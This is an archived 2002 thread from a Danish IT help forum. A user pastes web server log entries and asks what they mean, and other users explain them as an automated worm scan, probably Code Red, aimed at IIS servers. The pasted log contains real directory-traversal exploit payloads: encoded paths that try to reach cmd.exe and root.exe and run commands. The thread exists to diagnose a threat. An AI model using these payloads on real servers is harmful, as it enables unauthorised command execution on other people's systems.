CIO Tech Eksperten IT-JOB IT-Kurser Events Podcast Søg
Cookie ikon
Avatar billede skumpaq Nybegynder
27. august 2002 - 17:23 Der er 5 kommentarer og
3 løsninger

Er det godt mon?

Betyder det her noget godt: ?

IP - - [27/Aug/2002:08:30:21 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 279
IP - - [27/Aug/2002:08:30:21 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 277
IP - - [27/Aug/2002:08:30:21 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 287
IP - - [27/Aug/2002:08:30:21 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 287
IP - - [27/Aug/2002:08:30:22 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
IP - - [27/Aug/2002:08:30:22 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 318
IP - - [27/Aug/2002:08:30:22 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 318
IP - - [27/Aug/2002:08:30:23 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334
IP - - [27/Aug/2002:08:30:23 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
IP - - [27/Aug/2002:08:30:23 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
IP- - [27/Aug/2002:08:30:24 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
IP - - [27/Aug/2002:08:30:24 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
IP - - [27/Aug/2002:08:30:24 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 284
IP- - [27/Aug/2002:08:30:24 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 284
IP - - [27/Aug/2002:08:30:25 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
IP - - [27/Aug/2002:08:30:25 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301'

Betyder det noget godt??
Avatar billede bufferzone Praktikant
27. august 2002 - 17:26 #1
Det er en hacker/scriptkiddi der har kørt et script af mod dig, en kombineret port/vulnerability scanning. Få dig en personlig firewall f.eks. sygate fra www.sygate.com den er gratis og giver rimelig sikkerhed
Avatar billede tommyf Nybegynder
27. august 2002 - 17:26 #2
Et angreb fra Codered. Men virusen er kun rettet mod IIS saavidt jeg husker, saa du har ikke meget at frygte.
Avatar billede danielks Nybegynder
27. august 2002 - 17:28 #3
Du har sikkert alerede en firewall, med de kommandoer jeg kan se i denne fil... Den skader ikke, og hvis du ikke har en firewall er angrebet stadig slået i stykker (404)
Avatar billede skumpaq Nybegynder
27. august 2002 - 17:36 #4
bufferzone: Hmmm... Jeg kører med Hardware firewall i min router, og med ZoneAlarm som software firewall...
Avatar billede danielks Nybegynder
27. august 2002 - 17:37 #5
Ja netop... Den har blot smadret hacker angrebet, og kørt en "details"
Avatar billede skumpaq Nybegynder
27. august 2002 - 17:41 #6
Okey, men eftersom i alle tre har svaret på spørgsmålet giver jeg jer 10 point hver! :)
Det er vidst rimeligt! :)
Avatar billede danielks Nybegynder
27. august 2002 - 17:42 #7
K, tak...
Avatar billede thomasledet Nybegynder
28. august 2002 - 13:54 #8
det er ikke en hacker eller scriptkiddie (med 99,99995% sikkerhed) og det hjælper heller ikke meget at have en firewall, når det drejer sig om sådanne angreb.... tommyf har ret - det er med meget stor sansynlighed "bare" codered-virusen, der er på spil...

danielks> en firewall er ikke en magisk ting... i det øjeblik du har installeret en webserver og giver den "udgangstilladelse" i din firewall, så mister firewallen sin "magt" over denne port og webserveren. Dermed er webserveren et hul igennem firewallen og om du har en firewall eller ej gør ingen forskel... i hvert fald ikke, når det drejer sig om ovennævte typer angreb.
Avatar billede Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links. Der sættes "nofollow" på alle links.

Loading billede Opret Preview
Kategori
It-udvikling kurser
Uanset kodesprog, så giver vi dig mulighederne for at udvikle det, du behøver.
Se alle It-udvikling kurser

Flere spørgsmål fra Webservere kategorien

Titel Indlæg Oprettet Seneste aktivitet
Yousee Af nu_igen i Webservere 1 08/04/202408:21 09/04/202409:44
.htaccess til PHP API Af Jan i Webservere 9 29/02/202408:05 29/02/202409:30
Web.config Af ingeman i Webservere 0 07/01/202409:53 -
IIS virker ikke på asp sider... Af bsn i Webservere 8 15/10/202313:14 18/10/202308:51
Ingen forbindelse Af ZeBa i Webservere 5 08/04/202319:17 08/04/202319:55
Se alle spørgsmål i kategorien Opret spørgsmål

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Opret Log ind

Du kan også logge ind via nedenstående tjenester



Alle kategorier på Eksperten
Seneste spørgsmål Seneste aktivitet
I dag 00:30 Fejl i Ark Af Morten_Jepsen i Excel
I går 16:56 Kan min mobil hackes Af SBS i Mobiltelefoner
I går 12:56 Forskellige billeder til forskellige skærme ? Af snedker1 i Mac
I går 11:56 Om brug af funktionen sumprodukt Af Erik R i Excel
05/0722:41 Hjælp til at skrive opgave Af Needhelp i Småopgaver
White papers
Flere white papers »


Premium
Teaser billede
Dynamics-kæmpen Cepheo leverer røde tal i første regnskab som selvstændigt selskab
Læs mere »
IBM-direktør efter blodrødt regnskab: “Vi er godt på vej ud af det stormvejr, som ramte os i 2023”
Stiftere overvejer at gøre Flatpay til en bank – krav om compliance er en stopklods
Rejsekort reducerer kraftigt den tid, som selskabet vil beholde dine lokationsdata i: Vil nu slette dem efter få måneder
Se alle »
Computerworld
Teaser billede
Test: Endelig en skærm der er god til alt - lige fra gaming og underholdning til kontorbrug
Læs mere »
I dag træder nye de regler om registrering af din arbejdstid i kraft: Er du klar?
700.000 Linux-systemer kan været truet af ny alvorlig sårbarhed
Wordperfect-stifteren Bruce Bastian er død: Han revolutionerede tekstbehandlingen, men tabte slaget til Microsoft
Se alle »
CIO
Teaser billede
I dag træder nye de regler om registrering af din arbejdstid i kraft: Er du klar?
Læs mere »
Russisk hack af Microsoft er meget større end først antaget
Halter mange år bagefter: Langsom software-udvikling udfordrer kæmpe digitalt løft af Billund Lufthavn
Efter forbud fra Datatilsynet: Nu ændres data-håndteringen i din kørekort-app
Se alle »
Job & Karriere
Teaser billede
Bo solgte sit software-system for et treciftret millionbeløb: Brugte pengene på at købe 80 medarbejdere til ny storsatsning
Læs mere »
Norlys skal splittes op i fem selskaber: Nu bliver flere ansatte og ledere fyret
Dansk top-profil trækker sig fra Microsoft: Skal være direktør i TDC Erhverv
IBM Danmark skifter ud i sin øverste ledelse - her er den nye direktion
Se alle »
White paper
Teaser billede
Sådan høster du forretningsfordelene ved Internet of Things
Læs mere »
Sådan gør du: Elektronisk dokumentudveksling i praksis
Samlet platform sikrer sammenhæng, kontrol og sikkerhed i hybrid cloud
Rapport kortlægger de 13 bedste muligheder for at sætte turbo på din cloud computing
Se alle »

Events
Flere events »
White papers
Flere white papers »
IT-Kurser
Se alle vores it-kurser »